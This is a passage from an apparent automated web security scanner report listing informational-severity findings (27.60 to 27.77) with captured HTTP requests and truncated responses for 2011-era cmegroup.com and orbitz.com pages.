Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2993
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601606260348; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<h1>About CME Group</h1>
<p>As the world...s leading and most diverse derivatives marketplace, CME
...[SNIP]...
27.60. http://www.cmegroup.com/advance/build-1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/build-1.html

Request

GET /advance/build-1.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1792
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.7.1317601605963737; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<figure>
<div class="chart-container flash" data-swfvars="{ swf: '_files/flash/TwentyMillion.sw
...[SNIP]...
27.61. http://www.cmegroup.com/advance/build-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/build-2.html

Request

GET /advance/build-2.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1902
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601606028047; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<p>
Architects, city planners, property owners and construction companies can protect themselves from big jumps in
...[SNIP]...
27.62. http://www.cmegroup.com/advance/build.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/build.html

Request

GET /advance/build.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 91
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.20.1317601606011551; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<h1>Break new ground</h1>
</div>
27.63. http://www.cmegroup.com/advance/elements.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/elements.html

Request

GET /advance/elements.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9748
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:45 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.7.1317601605857264; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div id="elements-initial-content">
<h1>Elements of Advancement</h1>
<p>Every day, enterprises and institutions come face to f
...[SNIP]...
27.64. http://www.cmegroup.com/advance/finance-1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/finance-1.html

Request

GET /advance/finance-1.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2185
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.20.1317601606012385; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<h2>Every year, banks make loans totaling trillions of dollars. They...re not just funding projects...they.
...[SNIP]...
27.65. http://www.cmegroup.com/advance/finance-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/finance-2.html

Request

GET /advance/finance-2.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1679
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.28.1317601606022563; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<p>That...s where CME Group can help. By utilizing our financial tools, banks can reduce borrowing costs fo
...[SNIP]...
27.66. http://www.cmegroup.com/advance/finance.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/finance.html

Request

GET /advance/finance.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 100
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601606002371; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<h1>Finance new opportunities</h1>
</div>
27.67. http://www.cmegroup.com/advance/intro.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/intro.html

Request

GET /advance/intro.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 721
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:45 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601605683164; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="panel-content flash" id="intro-flash" data-swfvars="{ swf: '_files/flash/IntroQuestions.swf', width: '960', height: '470' }">
   <div class="no-flash">
       <h1>
        <span><img sr
...[SNIP]...
27.68. http://www.cmegroup.com/advance/plant-1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/plant-1.html

Request

GET /advance/plant-1.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1959
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:45 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.28.1317601605873055; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<h2>As the world gets wealthier, the demand for food is soaring, while producers struggle to provide more s
...[SNIP]...
27.69. http://www.cmegroup.com/advance/plant-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/plant-2.html

Request

GET /advance/plant-2.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1935
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:45 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.20.1317601605871017; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<p>
Producers need a way to manage this risk. CME Group &#8212; the world&#8217;s largest derivatives marketplace &
...[SNIP]...
27.70. http://www.cmegroup.com/advance/plant.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/plant.html

Request

GET /advance/plant.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 97
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:45 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.20.1317601605821341; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<h1>Harvest better results</h1>
</div>
27.71. http://www.cmegroup.com/advance/trade-1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/trade-1.html

Request

GET /advance/trade-1.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1865
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601606268519; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<h2>In 2009, global manufacturers exported $8.4 trillion worth of goods...more than 14 percent of the world
...[SNIP]...
27.72. http://www.cmegroup.com/advance/trade-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/trade-2.html

Request

GET /advance/trade-2.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1827
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=208.49.199.20.1317601606270101; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div class="content-left">
<p>
As companies do more business globally, they face ever-greater currency risk and its consequences. Because an u
...[SNIP]...
27.73. http://www.cmegroup.com/advance/trade.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/trade.html

Request

GET /advance/trade.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 95
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:46 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601606081031; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<h1>Trade beyond borders</h1>
</div>
27.74. http://www.cmegroup.com/advance/world-advances.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/world-advances.html

Request

GET /advance/world-advances.html HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1317601602.2; __utmb=239709073.1.10.1317601602; __utmc=239709073; __utmz=239709073.1317601602.2.2.utmcsr=spe.atdmt.com|utmccn=(referral)|utmcmd=referral|utmcct=/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:45 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601605874372; path=/; max-age=1209600; domain=.cmegroup.com; version=1

<div class="scrim"></div>
<div class="panel-content">
<div id="world-advances-video">
       <a href="video/CMEGroup_HowTheWorldAdvances.m4v" class="video-link xl">
           <h1 class="visuallyhidden">See ho
...[SNIP]...
27.75. http://www.orbitz.com/App/ViewDHTMLCalendar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewDHTMLCalendar

Request

GET /App/ViewDHTMLCalendar?z=7473&r=o HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
ntCoent-Length: 960
Date: Mon, 03 Oct 2011 00:06:52 GMT
Content-Length: 960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">

...[SNIP]...
27.76. http://www.orbitz.com/cacheable/ad.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /cacheable/ad.html

Request

GET /cacheable/ad.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; adRotator=true; JSESSIONID=DFE4F06BE571072B; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|egapp2189p.prod.orbitz.net; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA1NTEzNDh8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOTowOToxMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b25545525d5f4f58455e445a4a4217b9; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; mbox=session#1317600406536-142286#1317602423|check#true#1317600623|PC#1317600406536-142286.19#1320192592

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:38 GMT
ETag: "30a-4adda022fb780"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:45:34 GMT
Content-Type: text/html
Cteonnt-Length: 778
Server: Apache
Date: Mon, 03 Oct 2011 00:10:53 GMT
Age: 1519
Connection: keep-alive
Content-Length: 778

<html>
   <head></head>
   <body onLoad="window.adLoaded=true;" onUnload="window.adLoaded=false;" style="background-color:transparent">
       <script type="text/javascript">
           function waitForAdURL(timeout)
...[SNIP]...
27.77. http://www.orbitz.com/cacheable/ad_empty.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /cacheable/ad_empty.html

Request

GET /cacheable/ad_empty.html HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
